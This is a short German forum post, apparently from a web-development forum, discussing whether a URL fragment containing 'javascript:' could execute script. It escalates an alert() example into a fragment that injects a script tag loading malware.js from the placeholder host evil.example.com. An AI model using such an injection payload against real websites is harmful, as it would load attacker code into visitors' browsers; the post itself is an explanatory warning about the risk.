nicht angemeldet
Lieber RomanS,
Als meine Frage, ist etwas dergleichen möglich:
domain.tld?key=value#javascript:alert('yay')
?
spinnen wir doch diesen gefährlichen Gedanken einmal weiter:
domain.tld?key=value#javascript:document.body.innerHTML+='<script type="text/javascript" src="http://evil.example.com/malware.js"></script>'
Liebe Grüße,
Felix Riesterer.
--
ie:% br:> fl:| va:) ls:[ fo:) rl:| n4:? de:> ss:| ch:? js:) mo:} zu:)
ie:% br:> fl:| va:) ls:[ fo:) rl:| n4:? de:> ss:| ch:? js:) mo:} zu:)